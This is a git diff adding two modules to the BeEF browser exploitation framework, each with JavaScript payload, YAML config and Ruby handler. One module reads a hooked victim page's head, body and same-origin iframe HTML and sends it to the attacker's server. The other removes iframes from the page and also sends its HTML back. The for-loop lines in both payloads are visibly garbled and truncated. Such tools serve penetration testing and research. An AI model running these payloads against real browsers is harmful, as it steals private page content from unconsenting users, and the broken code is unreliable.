diff --git a/modules/browser/hooked_domain/get_page_html_iframe/command.js b/modules/browser/hooked_domain/get_page_html_iframe/command.js new file mode 100644 index 000000000..0209346c8 --- /dev/null +++ b/modules/browser/hooked_domain/get_page_html_iframe/command.js @@ -0,0 +1,32 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + try { + var html_head = document.head.innerHTML.toString(); + } catch (e) { + var html_head = "Error: document has no head"; + } + try { + var html_body = document.body.innerHTML.toString(); + } catch (e) { + var html_body = "Error: document has no body"; + } + try { + var iframes = document.getElementsByTagName('iframe'); + for(var i=0; i", <%= @command_id %>, 'iframe'+i+'='+iframes[i].contentWindow.document.body.innerHTML); + } + var iframe_ = "Info: iframe(s) found"; + } catch (e) { + var iframe_ = "Error: document has no iframe or policy issue"; + } + + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body+'&iframe_='+iframe_); + +}); + diff --git a/modules/browser/hooked_domain/get_page_html_iframe/config.yaml b/modules/browser/hooked_domain/get_page_html_iframe/config.yaml new file mode 100644 index 000000000..29cc0f4e9 --- /dev/null +++ b/modules/browser/hooked_domain/get_page_html_iframe/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + get_page_html_iframe: + enable: true + category: ["Browser", "Hooked Domain"] + name: "Get Page and iframe HTML" + description: "This module will retrieve the HTML from the current page and any iframes (that have the same origin)." + authors: ["bcoles","kxynos"] + target: + working: ["ALL"] diff --git a/modules/browser/hooked_domain/get_page_html_iframe/module.rb b/modules/browser/hooked_domain/get_page_html_iframe/module.rb new file mode 100644 index 000000000..e826a2ca4 --- /dev/null +++ b/modules/browser/hooked_domain/get_page_html_iframe/module.rb @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Get_page_html_iframe < BeEF::Core::Command + + def post_execute + content = {} + content['head'] = @datastore['head'] + content['body'] = @datastore['body'] + content['iframe_'] = @datastore['iframe_'] + save content + end + +end diff --git a/modules/browser/hooked_domain/remove_stuck_iframes/command.js b/modules/browser/hooked_domain/remove_stuck_iframes/command.js new file mode 100644 index 000000000..bc1837fb2 --- /dev/null +++ b/modules/browser/hooked_domain/remove_stuck_iframes/command.js @@ -0,0 +1,36 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + try { + var html_head = document.head.innerHTML.toString(); + } catch (e) { + var html_head = "Error: document has no head"; + } + try { + var html_body = document.body.innerHTML.toString(); + } catch (e) { + var html_body = "Error: document has no body"; + } + try { + var iframes = document.getElementsByTagName('iframe'); + var iframe_count = iframes.length; + for(var i=0; i", <%= @command_id %>, 'iframe_result=iframe'+i+'_found'); + //iframes[i].parentNode.removeChild(iframes[i]); + document.body.removeChild(iframes[0]); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'iframe_result=iframe'+i+'_removed'); + } + var iframe_ = "Info: "+ iframe_count +" iframe(s) processed"; + } catch (e) { + var iframe_ = "Error: can not remove iframe"; + } + + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body+'&iframe_='+iframe_); + +}); + diff --git a/modules/browser/hooked_domain/remove_stuck_iframes/config.yaml b/modules/browser/hooked_domain/remove_stuck_iframes/config.yaml new file mode 100644 index 000000000..d6d82f32c --- /dev/null +++ b/modules/browser/hooked_domain/remove_stuck_iframes/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + remove_stuck_iframes: + enable: true + category: ["Browser", "Hooked Domain"] + name: "Remove stuck iframe" + description: "This module will remove any stuck iframes (beware it will remove all of them on that node!)." + authors: ["kxynos"] + target: + working: ["ALL"] diff --git a/modules/browser/hooked_domain/remove_stuck_iframes/module.rb b/modules/browser/hooked_domain/remove_stuck_iframes/module.rb new file mode 100644 index 000000000..5c7e96b41 --- /dev/null +++ b/modules/browser/hooked_domain/remove_stuck_iframes/module.rb @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Remove_stuck_iframes < BeEF::Core::Command + + def post_execute + content = {} + content['head'] = @datastore['head'] + content['body'] = @datastore['body'] + content['iframe_'] = @datastore['iframe_'] + save content + end + +end